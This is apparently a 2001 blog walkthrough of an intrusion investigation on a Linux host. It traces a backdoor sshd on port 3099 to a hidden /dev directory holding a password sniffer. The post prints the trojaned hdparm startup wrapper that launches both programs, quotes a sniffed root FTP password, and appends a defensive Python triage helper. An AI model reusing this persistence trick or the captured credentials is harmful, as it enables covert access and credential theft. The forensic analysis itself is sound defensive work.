An Intrusion Investigation, Step by Step
Posted on 2001-03-24 07:50
A friend's host was compromised. A superscan scan of the target host showed port 3099 open. Logged in to the compromised host as root and checked which ports were open!

[root@RredDhatT bin]# netstat -a
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:auth                  *:*                     LISTEN
tcp        0      0 *:ftp                   *:*                     LISTEN
tcp        0      0 *:telnet                *:*                     LISTEN
tcp        0      0 *:www                   *:*                     LISTEN
.....
tcp        0      0 RredDhatT:7070          *:*                     LISTEN
tcp        0      0 RredDhatT:554           *:*                     LISTEN
tcp        0      0 *:3099                  *:*                     LISTEN
tcp        0      0 localhost:554           localhost:2869          TIME_WAIT
Active UNIX domain sockets (including servers)
Proto RefCnt Flags       Type       State         I-Node Path
unix  0      [ ]         DGRAM                    421
unix  0      [ ]         DGRAM                    433
u.........
unix  0      [ ACC ]     STREAM     LISTENING     544    /tmp/.font-unix/fs-1
unix  6      [ ]         DGRAM                    411    /dev/log
unix  0      [ ]         STREAM     CONNECTED     192    @00000018

Found an unidentified open port, 3099. Used ps -aux to look for illegitimate processes.

[root@RredDhatT bin]# ps -aux
USER       PID %CPU %MEM  SIZE  RSS TTY STAT START   TIME COMMAND
daemon     467  0.0  0.0  1144  104  ?  S    Mar 19  0:00 /usr/sbin/atd
nobody     449  0.0  0.0  1284  164  ?  S    Mar 19  0:00 identd -e -o
nobody     450  0.0  0.0  1284  164  ?  S    Mar 19  0:05 identd -e -o
nobody     454  0.0  0.0  1284  164  ?  S    Mar 19  0:00 identd -e -o
......
root      6249  0.0  0.2  1940 1176  ?  S    22:49   0:00 vi test
root      6259  0.0  0.0   940  416  ?  R    22:56   0:00 ps -aux
root     16560  0.0  0.1  1212  572  ?  S    21:58   0:00 in.telnetd: bbb
root     16569  0.0  0.2  2228 1120  ?  S    21:58   0:00 login -- vod
root     16742  0.0  0.1  2156  948  ?  S    21:58   0:00 su
root     16775  0.0  0.1  1748 1000  ?  S    21:58   0:00 bash
vod       6170  0.0  0.1  1696  940  ?  S    22:39   0:00 -bash
vod      16673  0.0  0.1  1696  940  ?  S    21:58   0:00 -bash
xfs        572  0.0  0.0  2060   60  ?  S    Mar 19  0:00 xfs -droppriv -daemon -port -1

Nothing abnormal found. Checked with lsof (list open files):

[root@RredDhatT /root]# /usr/sbin/lsof >test
[root@RredDhatT /root]# vi test

or grep 3099 * to see whether the test file contains the string 3099!

COMMAND    PID USER  FD  TYPE DEVICE SIZE  NODE NAME
test:sshdu 6224 root  3u  IPv4 28244       TCP *:3099 (LISTEN)

Found the executable!! The executable is sshdu. Kill it first, ask questions later!!

[root@RredDhatT /root]# kill 6224

Confirm 3099 is closed!!

[root@RredDhatT /root]# netstat -a -n
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:113             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
............
tcp        0      0 127.0.0.1:554           127.0.0.1:2894          TIME_WAIT
raw        0      0 0.0.0.0:1               0.0.0.0:*
Active UNIX domain sockets (including servers)
Proto RefCnt Flags       Type       State         I-Node Path
unix  0      [ ]         DGRAM                    421
unix  0      [ ]         DGRAM                    433
unix  0      [ ]         DGRAM                    548
..........
unix  0      [ ACC ]     STREAM     LISTENING     544    /tmp/.font-unix/fs-1
unix  6      [ ]         DGRAM                    411    /dev/log
unix  0      [ ]         STREAM     CONNECTED     192    @00000018

Port 3099 is closed!!! Now find where sshdu lives!

[root@RredDhatT /root]# locate sshdu
/dev/ida/.inet/sshdu
[root@RredDhatT ida]# ls *net -l
ls: *net: No such file or directory

No such directory! Damn!!!

[root@RredDhatT ida]# cd .inet

But you can cd into it!!

[root@RredDhatT .inet]# ll
total 768
-rwx------   1 root     root         7165 Sep 26  1983 linsniffer
-rwx------   1 root     root           75 Sep 26  1983 logclear
-rw-r--r--   1 root     root            5 Mar 24 06:42 pid
-rw-r--r--   1 root     root          704 Feb  2 20:02 s
-rwxr-xr-x   1 root     root         4060 Sep 26  1983 sense
-rwx------   1 root     root         8268 Sep 26  1983 sl2
-rw-------   1 root     root          541 Sep 26  1983 ssh_host_key
-rw-------   1 root     root          512 Mar 24 06:42 ssh_random_seed
-rwxr-xr-x   1 root     root       686535 Dec  3 04:37 sshdu
-rw-r--r--   1 root     root        47889 Mar 24 06:52 tcp.log
[root@RredDhatT .inet]# cd ..
[root@RredDhatT ida]# ls .inet -d -l
drwxr-xr-x   2 root     root         4096 Feb 14 11:43 .inet

Created on Feb 14; they got in while everyone else was out on dates!! Slick!!!

[root@RredDhatT /root]# cd .inet
[root@RredDhatT .inet]# more tcp.log
192.168.10.112 => server [21]
USER root
PASS adsdfa!@#
PWD
RETR /usr/local/Logs/rmaccess.log
QUIT

tcp.log recorded every login name and password plus the command history!!!!

Find where sshdu gets launched from:

[root@RredDhatT bin]# find /etc -type f -exec grep -s sshdu {} \; -print

No results!!! Keep going!!!!

[root@RredDhatT bin]# find /bin -type f -exec grep -s sshdu {} \; -print
[root@RredDhatT bin]# find /sbin -type f -exec grep -s sshdu {} \; -print
[root@RredDhatT bin]# find /usr -type f -exec grep -s sshdu {} \; -print
./sshdu -f ./s
/usr/bin/hdparm

Finally found the host file!!

[root@RredDhatT bin]# cd /usr/bin/
[root@RredDhatT bin]# ls hd* -l
-r-x------   1 root     root           76 Nov 12 06:01 hdparm
[root@RredDhatT bin]# more hdparm
#!/bin/sh
cd /dev/ida/.inet
./sshdu -f ./s
./linsniffer >> ./tcp.log &
cd /
[root@RredDhatT bin]#

Look for hdparm in /etc:

[root@RredDhatT bin]# find /etc -type f -exec grep -s hdparm {} \; -print
/usr/bin/hdparm -t1 -X53 -p
/etc/rc.d/rc.sysinit

Found the source!!!

[root@RredDhatT /root]# vi /etc/rc.d/rc.sysinit
#/usr/bin/hdparm -t1 -X53 -p

reboot! Scored a nice sniffer goodie!!!
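Added example, not part of the original post: a small triage helper that automates the two checks the walkthrough did by hand, comparing lsof LISTEN lines against a baseline of expected ports, and inspecting a file that a startup script treats as a compiled tool for the two tells seen here (a shell script sitting where an ELF binary belongs, and a dot-named path under /dev). The baseline port set, the lsof sample and the copy of the hdparm wrapper are constructed for this example.

```python
import re
from typing import List, Tuple

# Assumed baseline: ports this host legitimately listens on, taken from the
# post's netstat output (auth/113, ftp/21, telnet/23, www/80, 554, 7070).
EXPECTED_PORTS = {21, 23, 80, 113, 554, 7070}

# Constructed `lsof -i -n -P` sample modelled on the post's sshdu line;
# not output captured from a real host.
SAMPLE_LSOF = """\
COMMAND   PID USER   FD   TYPE DEVICE SIZE NODE NAME
identd    449 nobody  4u  IPv4  1234       TCP *:113 (LISTEN)
httpd     512 root   16u  IPv4  1300       TCP *:80 (LISTEN)
sshdu    6224 root    3u  IPv4 28244       TCP *:3099 (LISTEN)
"""

# Constructed copy of the replaced /usr/bin/hdparm wrapper shown in the post.
SAMPLE_HDPARM = (b"#!/bin/sh\ncd /dev/ida/.inet\n./sshdu -f ./s\n"
                 b"./linsniffer >> ./tcp.log &\ncd /\n")

LISTEN_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+.*TCP\s+\S*:(\d+)\s+\(LISTEN\)")
# A /dev path containing a dot-prefixed component: a device tree has no
# business holding hidden directories such as /dev/ida/.inet.
HIDDEN_DEV_RE = re.compile(r"/dev/(?:[^/\s]+/)*\.[^/\s]+")


def parse_listeners(lsof_output: str) -> List[Tuple[str, int, str, int]]:
    """Return (command, pid, user, port) for every LISTEN line in lsof -i output."""
    found = []
    for line in lsof_output.splitlines():
        m = LISTEN_RE.match(line)
        if m:
            cmd, pid, user, port = m.groups()
            found.append((cmd, int(pid), user, int(port)))
    return found


def unexpected_listeners(lsof_output: str, expected=EXPECTED_PORTS):
    """Listeners on ports outside the baseline: the processes to locate on
    disk and trace back to their startup hook, as the post did for sshdu."""
    return [l for l in parse_listeners(lsof_output) if l[3] not in expected]


def inspect_binary(content: bytes) -> List[str]:
    """Findings for a file that rc scripts expect to be a compiled tool."""
    findings = []
    if not content.startswith(b"\x7fELF"):
        findings.append("not-an-elf-binary")
    for m in HIDDEN_DEV_RE.finditer(content.decode("latin-1")):
        findings.append("hidden-dev-path:" + m.group(0))
    return findings
```

Running inspect_binary over every executable referenced from /etc/rc.d would have surfaced the 76-byte hdparm wrapper without first having to notice port 3099.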